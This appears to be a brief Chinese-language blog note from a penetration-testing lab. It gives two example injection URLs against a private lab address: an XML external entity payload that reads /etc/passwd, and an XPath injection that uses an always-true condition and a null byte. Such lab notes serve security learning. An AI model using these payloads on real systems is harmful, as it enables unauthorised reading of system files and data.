Ex1:
檢測字串:
http://192.168.83.132/xml/example1.php? xml=<!DOCTYPE blah [<!ELEMENT foo ANY><!ENTITY bar SYSTEM “file:///etc/passwd” >]><foo>%26bar;</foo>
Ex2:
檢測字串:
http://192.168.83.132/xml/example2.php?name=hacker%E2%80%99%20or%201=1]/parent::*/child::node()%00
>%26bar;</foo>
文章標籤
全站熱搜
